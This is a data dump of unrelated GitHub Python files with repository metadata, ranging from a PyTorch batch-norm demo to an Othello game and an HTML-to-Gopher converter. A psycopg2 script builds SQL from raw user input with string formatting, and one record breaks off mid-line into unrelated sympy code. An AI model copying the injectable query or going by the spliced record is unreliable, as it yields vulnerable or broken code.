app.main_frame.IsIconized())\n if app.viewer_frame.IsShown():\n app.viewer_frame.Iconize(not app.viewer_frame.IsIconized())\n\n def on_hide(event):\n if app.main_frame is None:\n app.create_frames()\n\n if app.main_frame.IsShown():\n app.main_frame.Hide()\n app.viewer_frame.Hide()\n elif app.viewer_frame.IsShown():\n app.viewer_frame.Hide()\n else:\n app.main_frame.Show()\n\n def on_quit(event):\n common.really_exit_app()\n \n wx.EVT_TASKBAR_LEFT_DOWN(tbicon, on_hide)\n wx.EVT_TASKBAR_RIGHT_DOWN(tbicon, on_right_down)\n wx.EVT_MENU(tbicon, ID_MINIMIZE, on_minimize)\n wx.EVT_MENU(tbicon, ID_HIDE, on_hide)\n wx.EVT_MENU(tbicon, ID_QUIT, on_quit)\n\n return tbicon\n \nelse:\n def show_tray_icon(app):\n class TbIcon:\n def Destroy(self):\n pass\n return TbIcon()\n\n","repo_name":"dvrhax/cornice3","sub_path":"tray.py","file_name":"tray.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71876949928","text":"from typing import List\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while left < right and nums[left] > nums[right]:\n i = (right - left) // 2\n if nums[left + i] > nums[left] and i > 0:\n left = i + left\n elif i > 0:\n right = i + left\n else:\n left = right\n\n if left > 0 and nums[0] <= target <= nums[left - 1]:\n return Solution.binary(nums[:left], target)\n\n if nums[left] <= target <= nums[-1]:\n solution = Solution.binary(nums[left:], target)\n return left + solution if solution != -1 else -1\n\n return -1\n\n @staticmethod\n def binary(nums: List[int], target: int) -> int:\n left, right = 0, len(nums) - 1\n\n while left < right:\n middle = (right - left) // 2\n if nums[middle + left] == target:\n return middle + left\n elif target > nums[middle + left]:\n left = left + middle + 1\n else:\n right = left + middle - 1\n\n return left if target == nums[left] else -1\n\n\n\nsolution = Solution()\nprint(solution.search(nums = [4,5,6,7,0,1,2], target = 2))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/33_search_in_rotated_array.py","file_name":"33_search_in_rotated_array.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17935310075","text":"import math\n\ndef champernowne(n) :\n \n champ = \"\"\n i = 0\n j = 0\n digits = []\n \n while len(champ)\")\n # Calc w\n w0 = 2*pi / sympy.simplify(periodo_T)\n # Getting the functions from keyboard \n input_user = input(\"Ingresa la lista de las funciones, separadas por ,\\n->\")\n expressions = input_user.split(\",\")\n # expressions_sympy\n expressions_sympy = [sympy.simplify(expression) for expression in expressions]\n\n # obtaining limits \n limits = []\n for expression in expressions:\n print(expression)\n limits.append(\n [sympy.simplify(input(\"limiteSuperior->\")),sympy.simplify(input(\"limiteInferior->\"))]\n )\n # calculating a0\n total_a0 = obtaining_a0(expressions_sympy,limits,periodo_T)\n expression_aN = obtaining_aN(expressions_sympy, limits, periodo_T, w0)\n expression_bN = obtaining_bN(expressions_sympy, limits, periodo_T, w0)\n\n print(f\"\\nEl resultado de a0 es: {total_a0} <--\\n\\n\")\n sympy.pretty_print(expression_aN, use_unicode=True)\n print(\"\\n\\n\")\n sympy.pretty_print(expression_bN, use_unicode=True)\n calculating_f_x(expression_aN,expression_bN, total_a0, w0)\n","repo_name":"RaigoXD/Fourier_Dummies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"601431521","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth.views import LoginView,LogoutView\n\nurlpatterns = [\n path('signup/', views.SignUp, name='signup'),\n path('login/', LoginView.as_view(template_name='auth/login.html'),name=\"login_url\"),\n path('logout/', LogoutView.as_view(next_page='login'),name=\"logout\"),\n path('users/list', views.index, name=\"users_list\"),\n path('users/add', views.AddUser, name=\"add_user\"),\n path('users/update/', views.UpdateUser, name=\"update_user\"),\n path('users/delete/', views.DeleteUser, name=\"delete_user\"), \n]\n","repo_name":"fa0xh1/Django_Base_Startup","sub_path":"myproject/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"281364559","text":"import torch\r\nfrom torch import nn\r\nimport torch.utils.data as Data\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n#train data\r\nx = np.linspace(-5, 5, 1000)[:, np.newaxis]\r\ny = np.square(x) + np.random.normal(0, 1, x.shape)\r\ntrain_x = torch.from_numpy(x).float()\r\ntrain_y = torch.from_numpy(y).float()\r\n\r\n# test data\r\ntest_x = np.linspace(-5, 5, 100)[:, np.newaxis]\r\ntest_y = np.square(test_x) + np.random.normal(0, 1, test_x.shape)\r\ntest_x = torch.from_numpy(test_x).float()\r\ntest_y = torch.from_numpy(test_y).float()\r\n\r\ntrain_dataset = Data.TensorDataset(train_x, train_y)\r\ntrain_loader = Data.DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, num_workers=2,)\r\n\r\nclass Net(torch.nn.Module):\r\n def __init__(self):\r\n super(Net,self).__init__()\r\n #self.bn_input=nn.BatchNorm1d(1,momentum=0.5)\r\n self.fc0=nn.Linear(1,10)\r\n self.bn0=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc1=nn.Linear(10,10)\r\n self.bn1=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc2=nn.Linear(10,10)\r\n self.bn2=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc3=nn.Linear(10,10)\r\n self.bn3=nn.BatchNorm1d(10,momentum=0.5)\r\n self.predict=nn.Linear(10,1)\r\n \r\n def forward(self,x):\r\n x = self.fc0(x)\r\n x = self.bn0(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc1(x)\r\n x = self.bn1(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc2(x)\r\n x = self.bn2(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc3(x)\r\n x = self.bn3(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n out=self.predict(x)\r\n return out\r\n\r\nnet=Net() \r\nopt=torch.optim.Adam(net.parameters(),lr=0.02)\r\n#print(opt.param_groups) \r\n\r\nloss_func=nn.MSELoss()\r\nif __name__ == \"__main__\":\r\n l=[] \r\n for epoch in range(10):\r\n print('Epoch: ', epoch)\r\n net.eval() # set eval mode to fix moving_mean and moving_var\r\n pred = net(test_x)\r\n l.append(loss_func(pred, test_y).data.item())\r\n net.train() # free moving_mean and moving_var\r\n for step, (b_x, b_y) in enumerate(train_loader):\r\n pred = net(b_x)\r\n loss = loss_func(pred, b_y)\r\n opt.zero_grad()\r\n loss.backward()\r\n opt.step() # it will also learns the parameters in Batch Normalization\r\n print(l)\r\n plt.figure(1)\r\n \r\n plt.plot(l, c='#74BCFF', lw=2, label='Batch Normalization')\r\n plt.xlabel('step');plt.ylabel('test loss');plt.ylim((0, 200));plt.legend(loc='best')\r\n\r\n # evaluation\r\n # set net to eval mode to freeze the parameters in batch normalization layers\r\n net.eval() \r\n preds = net(test_x)\r\n plt.figure(2)\r\n\r\n plt.plot(test_x.data.numpy(), preds.data.numpy(), c='#74BCFF', lw=3, label='Batch Normalization')\r\n plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='r', s=50, alpha=0.2, label='train')\r\n plt.legend(loc='best')\r\n plt.show()\r\n","repo_name":"xc-G/batchnormalization","sub_path":"BN_pytorch.py","file_name":"BN_pytorch.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15121769072","text":"#Exércício 1#\n\n\"\"\"\n Peça ao usuário para digitar o nome e a idade.\n Se forem digitados, exiba:\n 'Seu nome é {nome}'\n 'Seu nome invertido é {nomeinvertido}'\n Se nome contêm ou não espaços\n 'Seu nome tem {n} letras'\n 'A primeira letra do seu nome é {primeira_letra}'\n 'A última letra do seu nome é {ultima_letra}'\n Se nada for digitado:\n 'Desculpe, você deixou campos vazios'\n \n\"\"\"\n\nnome = input('Digite seu nome: ')\nidade = input('Digite sua idade: ')\n\nif nome != \"\" and idade != \"\":\n print(f'Seu nome é {nome}')\n print(f'Seu nome invertido é {nome[::-1]}')\n print(\" \" in nome)\n print(f'Seu nome tem {len(nome)} letras')\n print(f'A primeira letra do seu nome é {nome[0]}')\n print(f'A ultima letra do seu nome é {nome[len(nome) - 1 ]}')\nelse:\n print('Desculpe, você deixou campos vazios')\n\n#EXERCÍCIO 2#\n\n\"\"\"\nFaça um programa que peça ao usuário para digitar um número inteiro,\ninforme se este número é par ou ímpar. Caso o usuário não digite um número\ninteiro, informe que não é um número inteiro.\n\"\"\"\n\nnumero = int(input(\"Digite um número inteiro: \"))\n\nif (numero % 2) == 0:\n print('Numero {} é par'.format(numero))\nelif (numero % 3) == 0:\n print(f'Número {numero:,.2f} é impar')\n\n\"\"\"\nFaça um programa que pergunte a hora ao usuário e, baseando-se no horário \ndescrito, exiba a saudação apropriada. Ex. \nBom dia 0-11, Boa tarde 12-17 e Boa noite 18-23.\n\"\"\"\n\nhora = int(input(\"Informe a hora: \"))\n\nif hora >= 0 and hora <= 11:\n print('Bom dia!!!!')\nelif hora >= 12 and hora <= 17:\n print('Boa tarde!!!!')\nelse:\n print('Boa noite!!!!')\n\n\"\"\"\nFaça um programa que peça o primeiro nome do usuário. Se o nome tiver 4 letras ou \nmenos escreva \"Seu nome é curto\"; se tiver entre 5 e 6 letras, escreva \n\"Seu nome é normal\"; maior que 6 escreva \"Seu nome é muito grande\". \n\"\"\"\n\nprimeiro_numero = input('Informe seu primeiro nome: ')\ntamanho_nome = len(primeiro_numero)\n\nif tamanho_nome <= 4:\n print('Seu nome é curto')\nelif tamanho_nome in (5,6):\n print('Seu nome é normal')\nelse:\n print('Seu nome é muito grande')\n\n#EXERCÍCIO 3#\n\nnome = 'Victor Hugo'\nqtd_caracteres = len(nome)\nx = 0\ntexto = ''\n\nwhile x <= qtd_caracteres:\n\n try:\n texto_inicio = '*' + nome[x]\n texto = texto + texto_inicio\n except:\n print(texto)\n break\n \n x += 1 \n\n#EXERCÍCIO 4 - CALCULADORA#\n\nwhile True:\n print('Informe a operação desejada!')\n operacao = int(input('1 - SOMA 2 - SUBTRAÇÃO 3 - MULTIPLICAÇÃO 4 - POTENCIAÇÃO 5 - DIVISÃO 6 - SAIR: '))\n\n if operacao == 1:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero + segundo_numero\n \n print(f'O resultado é {resultado}')\n\n elif operacao == 2:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero - segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 3:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero * segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 4:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero ** segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 5:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero / segundo_numero\n\n print(f'O resultado é {resultado}')\n else:\n\n break\n\n#EXERCÍCIO 5#\n\nfrase = 'Sou o melhor, posso não ser' \\\n 'mas na minha cabeça, sou o melhor'.lower()\n\nx = 0\n\nletra_que_mais_apareceu = \" \"\nqtd_de_vezes = 0\n\nwhile x < len(frase):\n letra_atual = frase[x]\n\n if letra_atual == \" \":\n x +=1\n continue\n else:\n qtd = frase.count(letra_atual)\n\n if qtd_de_vezes < qtd:\n qtd_de_vezes = qtd\n letra_que_mais_apareceu = letra_atual\n\n x +=1\n\nprint(f'A letra que apareceu mais vezes é \"{letra_que_mais_apareceu}\" totalizando {qtd_de_vezes} aparições')\nprint(x)\n\n#EXERCÍCIO 6#\n\nimport os\n\nfrase_secreta = 'RIBEIRAO'\n\nfor frase_oculta in frase_secreta:\n frase_oculta = '*' * len(frase_secreta)\n\nprint(frase_oculta)\n\nqtd_tentativas = 0\n\nwhile frase_oculta != frase_secreta:\n\n while True:\n\n letra = str(input('Informe uma letra: ')).upper()\n\n qtd_tentativas += 1\n\n if letra in ('0','1','2','3','4','5','6','7','8','9'):\n print('Informe apenas letras.')\n continue\n elif len(letra) > 1:\n print('Apenas UMA letra')\n continue\n elif letra == \"\":\n print(\"Digite algo!\")\n continue\n else:\n break\n \n x = 0\n\n while True:\n\n if letra in frase_secreta:\n\n while x < len(frase_secreta):\n \n indice = frase_secreta.find(letra, x)\n\n if indice == -1:\n break\n else:\n frase_oculta = frase_oculta[0:(indice)] + letra + frase_oculta[indice+1:]\n \n x += 1\n else:\n print('Tente novamente')\n\n print(frase_oculta)\n\n break\n\nos.system('cls') #LIMPA O TERMINAL\nprint('VOCÊ GANHOU')\nprint(f'A frase oculta é \"{frase_oculta}\"')\nprint(f'A quantidade de tentativas foi de {qtd_tentativas}')\n\n#EXERCÍCIO 7#\n\nlista = [\"Victor\",\"Maria\",\"Birigo\"]\n\nfor indice, produto in lista:\n print(indice, produto)\nfor indice in [0, 1, 2]:\n print(indice)\n\n#EXERCÍCIO 8#\n\nimport os\nlista = []\n\nwhile True:\n \n opcao = input('Selecione uma das opções\\n[i]nserir, [a]pagar, [l]istar: ')\n\n if opcao == 'i':\n os.system('cls')\n valor = input('Informe o valor: ')\n \n if valor == \"\":\n print('Informe um valor')\n continue\n else:\n lista.append(valor)\n\n elif opcao == 'a':\n\n os.system('cls')\n\n indice = int(input('Informe o indice à ser retirado: '))\n\n if len(lista) < indice:\n print('Indice Inválido')\n else:\n try:\n lista.pop(indice)\n except:\n print('Lista Vazia')\n\n elif opcao == 'l':\n os.system('cls')\n lista_numerada = list(enumerate(lista))\n\n for indice, produto in enumerate(lista):\n print(indice, produto)\n \n break\n\n#EXERCÍCIO 9#\n\ndigitos = input('Informe os 9 primeiros dígitos do seu CPF: ')\n\nif len(digitos) > 9:\n print(f'Informe apenas 9 digitos você digitou {len(digitos)} digitos.')\nelse:\n num1, num2, num3, num4, num5, num6, num7, num8, num9 = digitos\n total = (int(num1) * 10) +( int(num2) * 9) + (int(num3) * 8) + (int(num4) * 7) +( int(num5) * 6) +( int(num6) * 5 )+ (int(num7) * 4 )+ (int(num8) * 3) +( int(num9) * 2)\n \n primeiro_digito = (total * 10) % 11\n\n if primeiro_digito > 9:\n primeiro_digito = 0\n\n print(primeiro_digito)\n\n total2 = (int(num1) * 11) +( int(num2) * 10) + (int(num3) * 9) + (int(num4) * 8) +( int(num5) * 7) +( int(num6) * 6 )+ (int(num7) * 5 )+ (int(num8) * 4) +( int(num9) * 3) + (int(primeiro_digito) * 2)\n\n segundo_digito = (total2 * 10) % 11\n\n print(segundo_digito)\n\n#EXERCÍCIO 10#\n\ndef mult(*num):\n total = 1\n\n for numero in num:\n total *= numero\n\n return total\n\nmultiplica = mult(1,3,5)\nprint(multiplica)\n\ndef tipo(multiplica):\n\n if multiplica % 2 == 0:\n print(f'Número {multiplica} é par!')\n else:\n print(f'Número {multiplica} é ímpar!')\n\ntipo(multiplica)\n \n#EXERCÍCIO 11#\n\ndef duplicar(numero):\n return numero * 2\n\nn2 = duplicar(3)\nprint(n2)\n\ndef multiplicador(multp):\n def multiplicar(numero):\n return numero * multp\n return multiplicar\n\nn2 = multiplicador(3)\nprint(n2(3))","repo_name":"vitihnho/Python","sub_path":"EXERCÍCIOS.py","file_name":"EXERCÍCIOS.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39409553176","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': 'A toy interactive C++ interpreter',\n 'author': 'Tiensbakung',\n 'url': '#URL to get it.#',\n 'download_url': '#Where to download it#',\n 'author_email': 'Tiensbakung@googlemail.com',\n 'version': '#0.1#',\n 'install_requires': [],\n 'packages': ['NAME'],\n 'scripts': [],\n 'name': 'interc'\n}\n\nsetup(**config)\n","repo_name":"Tiensbakung/interc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16787933614","text":"class Car:\n def __init__(self, speed, color, name, is_police):\n self._speed = speed\n self._color = color\n self._name = name\n self._is_police = is_police\n\n def go(self):\n print(\"Car started\")\n\n def stop(self):\n print(\"Car stopped\")\n\n def turn(self, direction):\n print(f\"Car turned to {direction}\")\n\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n\n\nclass TownCar(Car):\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n try:\n if self._speed > 60:\n print(\"You go really fast!\")\n except ValueError:\n print(\"Value error\")\n\n\nclass SportCar(Car):\n pass\n\n\nclass WorkCar(Car):\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n try:\n if self._speed > 40:\n print(\"You go really fast!\")\n except ValueError:\n print(\"Value error\")\n\n\nclass PoliceCar(Car):\n pass\n\n\ntown_car = TownCar(60, \"blue\", \"Mercedes\", False)\ntown_car.go()\ntown_car.show_speed()\n\nsport_car = SportCar(100, \"red\", \"Lamborghini\", False)\nsport_car.go()\nsport_car.turn(\"left\")\n\nwork_car = WorkCar(50, \"yellow\", \"Ford\", False)\nwork_car.go()\nwork_car.show_speed()\nwork_car.stop()\n\npolice = PoliceCar(70, \"white\", \"Gaz\", True)\npolice.go()\npolice.show_speed()\npolice.turn(\"right\")\npolice.stop()\n","repo_name":"Booharin/lesson_6","sub_path":"task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7947560552","text":"\nfrom flask import Flask, request, redirect, url_for\nimport psycopg2\n\napp = Flask(__name__)\n\ndef MyDBConn():\n\tcon=psycopg2.connect(database=\"sample\")\n\tc=con.cursor()\n\t#c.execute(\"insert into simple values('123','badulla')\")\n\trollno=raw_input(\"Enter Rollno:\")\n\tname=str(raw_input(\"Enter Name:\"))\n\tc.execute(\"insert into simple values({},'{}')\".format(rollno,name))\n\tcon.commit()\n\tif c:\n\t\tprint(\"Inserted successfully\")\n\telse:\n\t\tprint(\"Sorry,Try again\")\n\tcon.close()\n\t\n\ndef Retrive():\n\tcon=psycopg2.connect(database=\"sample\")\n\tc=con.cursor()\n\tc.execute(\"select * from simple\")\n\tprint(c.fetchall())\n\tcon.close()\n\n\n\nif __name__ == '__main__':\n\tMyDBConn()\n\tRetrive()","repo_name":"BadullaShaik/Demo-Project","sub_path":"FSND-Virtual-Machine/vagrant/MyConnection/myconn.py","file_name":"myconn.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34114089115","text":"# -*- coding: utf-8 -*-\nimport os, re, shutil\n\nCLEAN_REGEX = re.compile(\"(.+)\\s*\\(.+\\)\", re.IGNORECASE)\nIGNORE = [\"libobjc.A.dylib\", \"libSystem.B.dylib\", \"/System/Library/Frameworks\",\n \"/usr/lib/system/\"]\n\ndef checkIgnore(path):\n for elm in IGNORE:\n if path.find(elm) != -1:\n return True\n return False\n\ndef cleanEntry(path):\n res = CLEAN_REGEX.findall(path.strip())\n if len(res) == 0:\n return None\n res = res[0].strip()\n if checkIgnore(res):\n return None\n return res\n\ndef getIdLibs(lib, hasId = True):\n lines = os.popen(\"otool -L %s\" % lib).readlines()\n id = cleanEntry(lines[1])\n libs = []\n if not hasId:\n libs.append(id)\n id = None\n for dep in lines[2:]:\n dep = cleanEntry(dep)\n if dep: libs.append(dep)\n return [id, libs]\n\ndef otoolID(path, id):\n #print(\"otool id {} on {}\".format(id, path))\n os.popen(\"install_name_tool -id %s %s\" % (id, path))\n\ndef otoolChange(path, old, new):\n #print(\"otool change {} -> {} on {}\".format(old, new, path))\n os.popen(\"install_name_tool -change %s %s %s\" % (old, new, path))\n\ndef fixEntry(entry):\n return \"@executable_path/{}\".format(os.path.basename(entry))\n\ndef hasSuffix(path):\n return len(os.path.splitext(path)[1]) > 0\n\ndef localizeDep(dep):\n hasId = hasSuffix(dep)\n [id, libs] = getIdLibs(dep, hasId)\n if id:\n otoolID(dep, fixEntry(id))\n for lib in libs:\n otoolChange(dep, lib, fixEntry(lib))\n\ndef copy(dep, dst):\n #print(\"Copying {}\".format(dep))\n newfile = dst + os.path.sep + os.path.basename(dep)\n if os.path.exists(newfile):\n return newfile\n shutil.copyfile(dep, newfile)\n return newfile\n\ndef getDeps(bin):\n lines = os.popen(\"otool -L %s\" % bin).readlines()\n deps = []\n for dep in lines[1:]:\n dep = cleanEntry(dep)\n if dep: deps.append(dep)\n return deps\n","repo_name":"netromdk/blurator","sub_path":"scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2956295139","text":"# 面倒なので、座標系でも表記は統一していない(統一したい)\n\nimport numpy\n\nclass othello():\n def __init__(self,h,w):\n # 全方向の単位ベクトル\n self.vec=[[1,0],[-1,0],[0,1],[0,-1],[1,1],[-1,-1],[1,-1],[-1,1]]\n\n self.height=h\n self.width=w\n self.board=[]\n for i in range(self.height):\n tmp=[]\n for j in range(self.width):\n tmp.append('.')\n self.board.append(tmp)\n self.board[self.height//2-1][self.width//2-1]='B'\n self.board[self.height//2][self.width//2]='B'\n self.board[self.height//2][self.width//2-1]='W'\n self.board[self.height//2-1][self.width//2]='W'\n self.turn='B'\n self.turn_dict={'B':'Black','W':'White'}\n self.turn_list=['B','W']\n self.turn_index=0\n\n # ベクトル計算\n def _add_vec(self,a,b):\n return list(numpy.array(a)+numpy.array(b))\n\n def _find_marker(self,turn):\n ans=[]\n for y in range(self.height):\n for x in range(self.width):\n if self.board[y][x]=='.' and self._search(y,x,turn)!=None:\n ans.append([y,x])\n return ans\n\n def add_marker(self):\n marker_list=self._find_marker(self.turn)\n for mark in marker_list:\n self.board[mark[0]][mark[1]]='R'\n return\n\n # _explorer関数 -1(False):ひっくり返せるものなし 自然数n:n個ひっくり返せる\n def _explorer(self,origin,now_pos,vec):\n # そもそも範囲外の場合\n if not(0<=now_pos[0]0:\n return False\n return True\n \n def number_of_stone(self):\n ans={}\n for color in self.turn_list:\n ans[color]=0\n for line in self.board:\n for square in line:\n for turn in self.turn_list:\n if square==turn:\n ans[turn]+=1\n return ans\n\n # パスが必要かどうか\n def is_need_pass(self):\n return len(self._find_marker(self.turn))==0\n \n \ndef print_TwoDList(mylists):\n for mylist in mylists:\n for myobj in mylist:\n print(myobj,end=' ')\n print('')\n print('')\n return\n\ndef main():\n othello1=othello(8,8)\n print_TwoDList(othello1.board)\n othello1.board=[\n ['B','.','.','B','.','.','B','.'],\n ['.','W','.','W','.','W','.','.'],\n ['.','.','W','W','W','.','.','.'],\n ['B','W','W','.','W','W','W','B'],\n ['.','.','W','W','W','.','.','.'],\n ['.','W','.','W','.','B','.','.'],\n ['B','.','.','W','.','.','W','.'],\n ['.','.','.','B','.','.','.','B']]\n print_TwoDList(othello1.board)\n print('pass',othello1.is_need_pass())\n print('checkmate',othello1.is_checkmate())\n othello1.add_marker()\n othello1.put(3,3)\n print_TwoDList(othello1.board)\n print('pass',othello1.is_need_pass())\n print('checkmate',othello1.is_checkmate())\n return\n\ndef main2():\n ot=othello(8,8)\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n\nif __name__=='__main__':\n main()","repo_name":"NaokiY20/othello","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733741292","text":"import lxml.etree as E\nimport textwrap\nimport logging\nimport os\n\nPREFIXES = {\n 'b': '**',\n 'em': '*',\n 's': '~~',\n 'h1': '# ',\n 'h2': '## ',\n 'h3': '### ',\n 'h4': '#### ',\n 'h5': '##### ',\n 'h6': '###### ',\n 'p': ' '\n}\n\nPOSTFIXES = {\n 'b': '**',\n 'em': '*',\n 's': '~~',\n 'br': '\\n',\n}\n\nDOMAIN = 'invisibleup.com'\nPORT = '70'\n\ndef fix_path(basepath, path):\n if path.startswith(basepath):\n path = os.path.normpath(path)\n else:\n path = os.path.normpath(basepath + path)\n path = path.replace('\\\\', '/')\n if path[0] == '/':\n path = path[1:]\n if '.' not in path and path[-1] != '/':\n path += '/'\n return path\n\ndef img_tag(tag, basepath):\n ''' Handler for tags '''\n path = tag.get('src')\n alt = tag.get('alt')\n if path is None:\n return ''\n if alt is None:\n alt = os.path.basename(path)\n if 'http' in path:\n # External HTTP link\n return f'{alt}\\tURL:{path}\\t{DOMAIN}\\t{PORT}\\n'\n else:\n # Local Image\n path = fix_path(basepath, path)\n return f'I{alt}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n\ndef a_tag(tag, basepath):\n ''' Handler for tags '''\n # this is complicated\n if not tag.get('href'):\n return ''\n\n path = tag.get('href')\n if 'http' in path:\n # External HTTP link\n return f'h{tag.text}\\tURL:{path}\\t{DOMAIN}\\t{PORT}\\n'\n elif 'gopher://' in path:\n # External Gopher link\n splitted = path.split('/')\n try:\n domain, port = splitted[2].split(':')\n except ValueError:\n domain = splitted[2]\n port = '70'\n path = '/'.join(splitted[3:])\n return f'1{tag.text}\\t{path}\\t{domain}\\t{port}\\n'\n elif '.png' in path or '.jpg' in path or '.gif' in path:\n # Image\n path = fix_path(basepath, path)\n return f'I{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n elif '.ips' in path or '.zip' in path or '.exe' in path:\n # Some sort of binary something or other\n path = fix_path(basepath, path)\n return f'9{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n else:\n # Likely an internal Gopherspace link\n path = fix_path(basepath, path)\n return f'1{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n # TODO: External gopherspace links\n\ndef html2gopher(tag, basepath, width=80):\n output: str = ''\n\n if isinstance(tag, E._Comment):\n return ''\n\n if tag.text is None:\n tag.text = ''\n if tag.tail is None:\n tag.tail = ''\n\n if tag.tag != 'pre':\n tag.text = tag.text.replace('\\n', ' ')\n tag.text = tag.text.replace('\\t', '')\n tag.tail = tag.tail.replace('\\n', ' ')\n tag.tail = tag.tail.replace('\\t', '')\n\n # Tag prefix\n if tag.tag in PREFIXES:\n tag.text = PREFIXES[tag.tag] + tag.text\n # Postfix\n if tag.tag in POSTFIXES:\n tag.text += POSTFIXES[tag.tag]\n\n # Add content\n if tag.tag == 'a':\n output = a_tag(tag, basepath)\n elif tag.tag == 'img':\n output = img_tag(tag, basepath)\n elif tag.tag == 'hr':\n output += '-' * width\n elif tag.tag == 'td':\n output += tag.text\n output += '\\n' + '-' * width\n elif tag.tag == 'tr':\n output += '\\n' + '=' * width\n elif tag.tag == 'th':\n output += tag.text\n output += '\\n' + '+=' * (width // 2)\n else:\n output += tag.text\n\n # Run recursively for each subnode\n for child in tag:\n if child.tag == 'a':\n output += '\\n' + html2gopher(child, basepath, width)\n elif tag.tag == 'a' and child.tag == 'img':\n # lol whoops use alt as the label\n tag.text = child.get('alt')\n output = a_tag(tag, basepath)\n elif child.tag == 'style' or child.tag == 'script':\n continue\n elif child.tag == 'form' or (\n child.get('class') is not None and\n 'gopherignore' in child.get('class')\n ):\n output += ' ' * 12 + 'Interactive content not available via Gopher\\n'\n else:\n output += html2gopher(child, basepath, width)\n\n # \"Tail\"\n if tag.tail is not None:\n output += tag.tail\n\n del tag # being too cautious...\n\n # Word wrap\n output2 = ''\n for line in output.splitlines():\n if line.count('\\t') != 3:\n output2 += '\\n'.join(textwrap.wrap(line, width)) + '\\n'\n else:\n label, url, host, port = line.split('\\t')\n rsctype = label[0]\n label = label[1:]\n labels = textwrap.wrap(label, width)\n del label\n for label in labels:\n output2 += rsctype + label + '\\t' + url + '\\t' + host + '\\t' + port + '\\n'\n\n del output\n return output2\n","repo_name":"InvisibleUp/iup_server","sub_path":"iup_server/html2gopher.py","file_name":"html2gopher.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40591119533","text":"# Define a function that can accept two strings\n# as input 